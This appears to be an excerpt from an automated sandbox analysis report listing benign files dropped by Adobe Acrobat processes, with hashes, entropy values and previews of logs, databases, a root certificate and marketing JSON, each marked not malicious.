                                                                                        Preview:*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):322
                                                                                        Entropy (8bit):5.177696223027514
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pAq2PqLTwi2nKuAl9OmbzNMxIFUt8hhZmw+NikwOqLTwi2nKuAl9OmbzNMFLJ:pAv8wZHAa8jFUt8hh/+45TwZHAa84J
                                                                                        MD5:B569FC7268A43DC601E2D3BCD71AC72B
                                                                                        SHA1:C7D8AF0020C15B408E6AE244D2FAB30DF4FD6C2B
                                                                                        SHA-256:A70AA4E41BB67C779A44528E5B3B883CCE7BA2881969D7CBC64ADDFB9830D982
                                                                                        SHA-512:83EC67C7530CE736814345E4A20052A811134604759EE4208062A196038FE57668ED4B2BE2D07E3803D4CC35C8565D26CED8C5C771614AEAB9090612C620A7E6
                                                                                        Malicious:false
                                                                                        Preview:2024/12/23-07:39:41.938 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:39:41.939 1c10 Recovering log #3.2024/12/23-07:39:41.941 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):322
                                                                                        Entropy (8bit):5.177696223027514
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pAq2PqLTwi2nKuAl9OmbzNMxIFUt8hhZmw+NikwOqLTwi2nKuAl9OmbzNMFLJ:pAv8wZHAa8jFUt8hh/+45TwZHAa84J
                                                                                        MD5:B569FC7268A43DC601E2D3BCD71AC72B
                                                                                        SHA1:C7D8AF0020C15B408E6AE244D2FAB30DF4FD6C2B
                                                                                        SHA-256:A70AA4E41BB67C779A44528E5B3B883CCE7BA2881969D7CBC64ADDFB9830D982
                                                                                        SHA-512:83EC67C7530CE736814345E4A20052A811134604759EE4208062A196038FE57668ED4B2BE2D07E3803D4CC35C8565D26CED8C5C771614AEAB9090612C620A7E6
                                                                                        Malicious:false
                                                                                        Preview:2024/12/23-07:39:41.938 1c10 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:39:41.939 1c10 Recovering log #3.2024/12/23-07:39:41.941 1c10 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):66934
                                                                                        Entropy (8bit):2.436424201832609
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                                        MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                                        SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                                        SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                                        SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                                        Malicious:false
                                                                                        Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                        Category:dropped
                                                                                        Size (bytes):86016
                                                                                        Entropy (8bit):4.438666675080822
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ye+ci5GieD9FiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmz5:pieD9JurVgazUpUTTGt
                                                                                        MD5:7D3214C5C94D5F967C6EEF57013296AC
                                                                                        SHA1:DA3B85C6A7493251839B30486BBE8235EA105C7A
                                                                                        SHA-256:64A2ED5C7937E56AB91BAD57E875683B312E7518A7865FED64D81C723C9A8B72
                                                                                        SHA-512:ED665CF2518445AB4791BD1078E54F88420DCDB1DEED6BA3464700E6B4474FED16F17E070B51D73ED9E4CEB651CF6E2DC9022BA9D5CC40BB87EE29D57F508ED7
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):3.7693446052754243
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:7MvJioyVy/ioyXcoy1C7oy16oy1p6KOioy1noy1AYoy1Wioy1oioykioyBoy1non:7wJuy/GhYyXjBiEb9IVXEBodRBkZ
                                                                                        MD5:A957425AC35AF9AE3E381366327582AC
                                                                                        SHA1:85BD533DCD670F099BBC8B0CA437B1105A828E04
                                                                                        SHA-256:577B22930AAD1AF22A108E8ED5638C289D8AA66D1B9D6B876166E163560E6187
                                                                                        SHA-512:66D503C2CAB10FB32625F2EB33607C9F9840654C02414957AA9003A3EFEAEC1576B6E1B8D06E6F171F635CBE0DFB0CD86CF7EC5AEBD5206E81CA441267673BAF
                                                                                        Malicious:false
                                                                                        Preview:.... .c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                        Category:dropped
                                                                                        Size (bytes):71954
                                                                                        Entropy (8bit):7.996617769952133
                                                                                        Encrypted:true
                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                        Malicious:false
                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):2.756901573172974
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:kkFklZz/+EvfllXlE/HT8k2F7l1NNX8RolJuRdxLlGB9lQRYwpDdt:kKq+EQT8Zl7NMa8RdWBwRd
                                                                                        MD5:BF3CD47746CEEED96221ED517DA0A634
                                                                                        SHA1:8E3D1E8E41DD16BE5030191D13411F098B64675D
                                                                                        SHA-256:40DB48ADE06353528F2E032BB20F78D32C87A059911E247209962121E05B92BD
                                                                                        SHA-512:E842AC710AFA66884593D9B3C5A1C2C2E0A0EA7C8027711DF8B65F410DE7B2326CDEEEC732E108DD2B1A4C46A39410A8217DDF908BB4F44414C00E74249E951F
                                                                                        Malicious:false
                                                                                        Preview:p...... ..........E.7U..(....................................................... ..........W....S...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):3.2478978672539016
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKoii9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rdDImsLNkPlE99SNxAhUe/3
                                                                                        MD5:4E4F301D2B505CD1F34B1DB5EDB8A985
                                                                                        SHA1:6BC5D8EB9D9A16F41A14FD1356F6858DDCE6158B
                                                                                        SHA-256:B4BF5F1CF15C4FD1B3DA8FD25FD0B86B2C7CC60F84D2CA5CF5B78D121D3754AE
                                                                                        SHA-512:7D28E78D34178B9AC7671F75F4B65375B03187E38D8DB66B02BFB4C10F3C55EC789C9F2F8B843391F77EA2E84240862F7B09DA5E5BE6370698C06CD47ABB7F56
                                                                                        Malicious:false
                                                                                        Preview:p...... ........=.^.7U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.351086183918057
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJM3g98kUwPeUkwRe9:YvXKXU8IT5LjIP9GMbLUkee9
                                                                                        MD5:AAF14749D2D3780DBAA44A76C49A2C69
                                                                                        SHA1:27118391C11DDC25FC0C2F92845B51641BC09F4B
                                                                                        SHA-256:7903FEA1774964D71C738C1F4A36D2F3621E00121142F0871BF6D2EEED25F851
                                                                                        SHA-512:D351D93E05223B8A88C5D253DA6727CAA6AA9DB3C95FC45896807E21BDE05E5728585D3629824B194D82B7A1B1E741DC24E8B840D8E329BA622CFF62AD04A774
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.303122778197107
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfBoTfXpnrPeUkwRe9:YvXKXU8IT5LjIP9GWTfXcUkee9
                                                                                        MD5:8ABAA2F00F589061228D2696A1FB1EEB
                                                                                        SHA1:8C211EE803DDE126205BF094C7B58A05BBE835A4
                                                                                        SHA-256:9BE56B91EB8CC332A73B71642515DE24CFF4DB9D491DA9AE1F4189F726E256A1
                                                                                        SHA-512:AC441C809327A9C3F55625A51959B8CD7F1D0DBEA24BB6784772CB2711D301BBD44793B0155E9A31716915F7875CC202DDDDE9E216E5E4EC125DCA373B08DAC2
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.2821178135921825
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfBD2G6UpnrPeUkwRe9:YvXKXU8IT5LjIP9GR22cUkee9
                                                                                        MD5:B8B98D83BC01C9124B5B68212604AC49
                                                                                        SHA1:094B40300358490AE5D2B88018820A5CA3605E13
                                                                                        SHA-256:58068121F9E66310F9E82AE539292C767CD010A4F9A5DB6194E6D7FFD545A310
                                                                                        SHA-512:8758AE17865F3EDCF36A0CA98D22F7401956A2852555BD280059F33B7E8D835BEE414CB5468973D6C6F7A4A27897EC4730BE5DE25A72B66C5E24246F36204674
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):285
                                                                                        Entropy (8bit):5.331657437445251
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfPmwrPeUkwRe9:YvXKXU8IT5LjIP9GH56Ukee9
                                                                                        MD5:D17C05AC933B31C0FAE8422ABC09EC49
                                                                                        SHA1:C6A09B50B0B852279F6147BFB627F2EDD0FEB15D
                                                                                        SHA-256:F1814CACA23185E01EE78DC44B1453700E80B8D7A15145A3F510E1B06FA7D8F6
                                                                                        SHA-512:6D411AD71D8B373E73C4A0592BAF47205A3D70F5055561D2B10B3BEF85A309851984C5D8DC2767E130903E886FCE095923D6113F92890BD181A2CE458223553D
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1123
                                                                                        Entropy (8bit):5.689689795802758
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6XuT5XIapLgE9cQx8LennAvzBvkn0RCmK8czOCCS5:YvfX3hgy6SAFv5Ah8cv/5
                                                                                        MD5:09A386F4B0967918A666EC91E655416B
                                                                                        SHA1:D6915806F2577903149FE7A85545E2C401CCD6BF
                                                                                        SHA-256:F1C62F88EB59E0FEFCF22091DEC5EB019C3579018415488A8B95AB5C5DEEB70D
                                                                                        SHA-512:5A2D9C896056A0FFB985EC2FC78F7F441D3FDCFFA3CF4C77C5C2EDDBFC947807F53A817CFB52DE930A7DCC4562972E9C470569777211AFCDA5EC88B73E19C939
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.303219078226505
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJf8dPeUkwRe9:YvXKXU8IT5LjIP9GU8Ukee9
                                                                                        MD5:0B882050B4534C75EBD994CEF943EC06
                                                                                        SHA1:5BAC8473F396B11FD9753DE17AFF61C2925F3CF7
                                                                                        SHA-256:476A3769F4A478A277BA251D7294117D4DDAC547DC9C7E851357AA55AF01E236
                                                                                        SHA-512:19D1395688086D8489005942B92393A063C910D115C7F2262F7420F9B4C996829DA9E60A56EAFF944D9CDBFFE6E91E91225A7877ECA8F905EABCC33DDBE93303
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.294724858682633
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfQ1rPeUkwRe9:YvXKXU8IT5LjIP9GY16Ukee9
                                                                                        MD5:8DC3B820D7ADEF3AD55E6EEAA9EEE1CB
                                                                                        SHA1:B9A51ACBAA7BC07EE884766B2FED844767E750C3
                                                                                        SHA-256:B9F30A3756E411C142DCCB6B86F0DE1DC4C9EF7A8F035D0D8DFB90254F403D54
                                                                                        SHA-512:139FD7D27076153D5A8E2056275D089A1628C72142B0CD744316F7393D912737D71C4DC59A1F0238DB64E7A5C011D67AA76B645948AAB6FCC6DAB277A38D9E8F
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.310951482531206
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfFldPeUkwRe9:YvXKXU8IT5LjIP9Gz8Ukee9
                                                                                        MD5:2273C1EDFDF5BA5B5DE1D32D43B63DA6
                                                                                        SHA1:F6DB6C8F1996511CD7319A23257041EA9EB08BEA
                                                                                        SHA-256:EC65456E3BD1D17B812177A7579ECA1347CE0ED7B908C62827D69160B73B0BBC
                                                                                        SHA-512:9CF1254D26A702883130C99A96C56E7DB018420CDB8601CB5CD91CB5CF31C7AD363C64953744F53F1A955B9257EBDEBA5C9F6043B8E60D4CF1C3F41B6FB5532A
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.328795793190048
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfzdPeUkwRe9:YvXKXU8IT5LjIP9Gb8Ukee9
                                                                                        MD5:7CB07C53F1641A742EBEC2247357709F
                                                                                        SHA1:AEC35E80E764568EB5A480B373880E5817F97F8C
                                                                                        SHA-256:21BFA41CAAC9F772EEE878F1E097B4C6C011AA1BCDC349A2F727AE3D45624647
                                                                                        SHA-512:6E2AE751ED0555A54EF273720F372E8E320E9E1F5E493D4746F8FF9C1F8D85420B6B22C1FD71D7B1F2799BE0D3D8C98C7391146A25255724FFD5F15E40C13FA9
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.309635359609509
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfYdPeUkwRe9:YvXKXU8IT5LjIP9Gg8Ukee9
                                                                                        MD5:1E263823E5259198D58EF2E6A90A04BD
                                                                                        SHA1:1100472FFDED091B814855F335011F6159FDFC72
                                                                                        SHA-256:F6B20C8F4CE8F288B41AAD58C370C06FC389431494B681F13B646972D6595E70
                                                                                        SHA-512:710D140C9346EB907C8F554F4127A55F8E931E4E36314EF32FB28497A86365BDD6DCD470DD2C541B8726116776F42419442DE92359A6E3194682C5ED277C75E6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.296154359972867
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJf+dPeUkwRe9:YvXKXU8IT5LjIP9G28Ukee9
                                                                                        MD5:1354C250FB8D07B1CD4066E8EB3FC128
                                                                                        SHA1:A1647EB75BBA13DA13CE0491DFFC3EE4B00A2413
                                                                                        SHA-256:8B63D1F32220F1E7B45EF00434423F43CA26313E3572810E3D4A14B7F3E925EA
                                                                                        SHA-512:DB1C0FDC96F6E9955191E5DC389684E01B622430CC89F80D891E189F43384D9E85604E3E60FAF79712C634D73550E544DBBF7C6B65B365D3203AB3875236F8E7
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"336ed862-9601-4810-abbf-333a4fcbde33","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1735136017928,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.293116234880559
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HXgxVRkThpmSg1c2LjcWkHvR0YK0eoAvJfbPtdPeUkwRe9:YvXKXU8IT5LjIP9GDV8Ukee9
                                                                                        MD5:C7C7A38F5A74B0D9030BF41D1F06193A
